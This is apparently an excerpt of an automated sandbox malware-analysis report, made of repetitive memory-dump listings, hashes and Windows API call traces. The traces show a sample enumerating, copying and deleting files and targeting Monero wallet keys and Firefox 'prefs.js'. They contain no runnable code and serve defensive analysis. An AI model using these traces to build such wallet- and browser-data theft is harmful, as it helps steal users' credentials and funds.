                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 82f1d1791b2b668d8c804ac6943c7ed4d181818984fb560c6d964339ff686610
                            • Instruction ID: 3c1f87b22eb3b0b35bb946e1cee4b8945626d04fdeccfd8b8414412f5539aeb3
                            • Opcode Fuzzy Hash: 82f1d1791b2b668d8c804ac6943c7ed4d181818984fb560c6d964339ff686610
                            • Instruction Fuzzy Hash: 626166B1600218ABCB34EBA0DD59FEA73BCFB48700F04558CB54DA6145EB769B46CFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EC4580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC4587
                            • wsprintfA.USER32 ref: 00EC45A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EC45BD
                            • StrCmpCA.SHLWAPI(?,00ED0FC4), ref: 00EC45EB
                            • StrCmpCA.SHLWAPI(?,00ED0FC8), ref: 00EC4601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC468B
                            • FindClose.KERNEL32(000000FF), ref: 00EC46A0
                            • lstrcat.KERNEL32(?,00A9E400), ref: 00EC46C5
                            • lstrcat.KERNEL32(?,00A9D700), ref: 00EC46D8
                            • lstrlen.KERNEL32(?), ref: 00EC46E5
                            • lstrlen.KERNEL32(?), ref: 00EC46F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 407896670adf5face1404b2aa691998bce2c388a51256dd1bbde9b2a704a7dcf
                            • Instruction ID: 00e16b80b0a09a08ecd918f6cd33d48b7f26c09459f3a83cd94c711684f719e8
                            • Opcode Fuzzy Hash: 407896670adf5face1404b2aa691998bce2c388a51256dd1bbde9b2a704a7dcf
                            • Instruction Fuzzy Hash: 525158B16002189BC734EB70DD9AFE9737CAB58700F40558DB54DA3184EB769B85CF91
                            APIs
                            • wsprintfA.USER32 ref: 00EC3EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EC3EDA
                            • StrCmpCA.SHLWAPI(?,00ED0FAC), ref: 00EC3F08
                            • StrCmpCA.SHLWAPI(?,00ED0FB0), ref: 00EC3F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC406C
                            • FindClose.KERNEL32(000000FF), ref: 00EC4081
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 05e0523d68368f8763a3e17ca9a1633438ef57dcf1d38497495f827991f4c268
                            • Instruction ID: 5b1bc4b3b066d6fb4f24d88a61b85cc578d7d4f6aaf361e667128297281fd3be
                            • Opcode Fuzzy Hash: 05e0523d68368f8763a3e17ca9a1633438ef57dcf1d38497495f827991f4c268
                            • Instruction Fuzzy Hash: 465144B2900218EBCB34EBB0DD46FEA73BCBB48300F44459DB65DA6044DB769B868F51
                            APIs
                            • wsprintfA.USER32 ref: 00EBED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EBED55
                            • StrCmpCA.SHLWAPI(?,00ED1538), ref: 00EBEDAB
                            • StrCmpCA.SHLWAPI(?,00ED153C), ref: 00EBEDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBF2AE
                            • FindClose.KERNEL32(000000FF), ref: 00EBF2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: fdab186a246f8a37f307f23a51ba61b6d55ce26f3ac4a321b912572ef7cda1bb
                            • Instruction ID: e52d1ab69f985a5c67cd5302bdfdac39ada355048a6cbbc0738843ec2271cce1
                            • Opcode Fuzzy Hash: fdab186a246f8a37f307f23a51ba61b6d55ce26f3ac4a321b912572ef7cda1bb
                            • Instruction Fuzzy Hash: 85E1EA7291111C9AEB28EB60DD56FEE73B8AF54304F4451ADB40A72092EE316F8BCF51
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00ED15B8,00ED0D96), ref: 00EBF71E
                            • StrCmpCA.SHLWAPI(?,00ED15BC), ref: 00EBF76F
                            • StrCmpCA.SHLWAPI(?,00ED15C0), ref: 00EBF785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBFAB1
                            • FindClose.KERNEL32(000000FF), ref: 00EBFAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: bdf3d46be8b2372434c7199485705ebc606bf7f4a782566f5db8b30e50cc6518
                            • Instruction ID: e627c087d89a7eae50490b8dc729164d98c08af3cdb1ef069a5fe8b9c78371f9
                            • Opcode Fuzzy Hash: bdf3d46be8b2372434c7199485705ebc606bf7f4a782566f5db8b30e50cc6518
                            • Instruction Fuzzy Hash: FEB144729001189BCB28EF60DD56FEE73B9AF54304F4495BDE40AA7141EF315B4ACB91
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00ED510C,?,?,?,00ED51B4,?,?,00000000,?,00000000), ref: 00EB1923
                            • StrCmpCA.SHLWAPI(?,00ED525C), ref: 00EB1973
                            • StrCmpCA.SHLWAPI(?,00ED5304), ref: 00EB1989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EB1D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00EB1DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB1E20
                            • FindClose.KERNEL32(000000FF), ref: 00EB1E32
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: df5e93b72f799eaf2307e06d155f254e3bef496f1b45616f699343b241826154
                            • Instruction ID: 488c1c7a661c77fa18ece64b2b7c2f1a75d9248f6f77bdfb6dce25b819a16f5e
                            • Opcode Fuzzy Hash: df5e93b72f799eaf2307e06d155f254e3bef496f1b45616f699343b241826154
                            • Instruction Fuzzy Hash: D512207291011C9BCB19EB60DD96FEE73B8AF54304F4461ADA11A72091EF316F8ACF91
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00ED0C2E), ref: 00EBDE5E
                            • StrCmpCA.SHLWAPI(?,00ED14C8), ref: 00EBDEAE
                            • StrCmpCA.SHLWAPI(?,00ED14CC), ref: 00EBDEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBE3E0
                            • FindClose.KERNEL32(000000FF), ref: 00EBE3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 92bd333c2e539783fa7dbb04a31504c9d58b0bf23dd831cd3fc5e8c709fb07dd
                            • Instruction ID: 77c444f8efef75fff4bddd32a302c26265f93b83154d26d4878d10b6dc369b50
                            • Opcode Fuzzy Hash: 92bd333c2e539783fa7dbb04a31504c9d58b0bf23dd831cd3fc5e8c709fb07dd
                            • Instruction Fuzzy Hash: 12F1BC7291011C9BCB29EB60DD96FEE7378AF54304F4461AEA41A72091EE316F4BCF51
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00ED14B0,00ED0C2A), ref: 00EBDAEB
                            • StrCmpCA.SHLWAPI(?,00ED14B4), ref: 00EBDB33
                            • StrCmpCA.SHLWAPI(?,00ED14B8), ref: 00EBDB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBDDCC
                            • FindClose.KERNEL32(000000FF), ref: 00EBDDDE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 4fca3758ccdb6dee5465c0d51ea89f5b20270ef89499bd5da87ce9e31a306053
                            • Instruction ID: 50f3a149b85ce7a8aae0a98fab17331f9d7311fb245ae10ebec25d628a3518b5
                            • Opcode Fuzzy Hash: 4fca3758ccdb6dee5465c0d51ea89f5b20270ef89499bd5da87ce9e31a306053
                            • Instruction Fuzzy Hash: 6891597390010897CB14FF70ED5AEEE73BCAB84304F44556DF85AB6141EE359B1A8B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6_?$;3\v$GwG_$Qr_m$tI:x$|n&$7U&$|/7
                            • API String ID: 0-2565155610
                            • Opcode ID: 5a482773397d9040a9325e4edaea7592d1d6370ad0e5b5d29fd48270bd9319c6
                            • Instruction ID: 89360c6f0b5ada158372c612b05ae1e8596b39d0bfb2168b4088f68ab2148ba7
                            • Opcode Fuzzy Hash: 5a482773397d9040a9325e4edaea7592d1d6370ad0e5b5d29fd48270bd9319c6
                            • Instruction Fuzzy Hash: 8FB219F3A08210AFE304AE2DDC8577AB7D9EFD4720F1A853DEAC4C7744E67598058692
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: '1=S$F49$NrV$Sz%$W5$X"o$|Zk?$>vz
                            • API String ID: 0-2818733002
                            • Opcode ID: 2c210e00525e2fa10282bb719059415bff3b3a987de02118a40cf59ecf316d21
                            • Instruction ID: d6657965fb2b69e686500c6c771c15cf531de2f05be426be39dc3b706b8cf7b5
                            • Opcode Fuzzy Hash: 2c210e00525e2fa10282bb719059415bff3b3a987de02118a40cf59ecf316d21
                            • Instruction Fuzzy Hash: A9B2E8F360C200AFE3046E29EC8567AFBE9EF94720F16893DE6C4C7744E63598458796
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,00ED05AF), ref: 00EC7BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00EC7BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00EC7C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EC7C62
                            • LocalFree.KERNEL32(00000000), ref: 00EC7D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
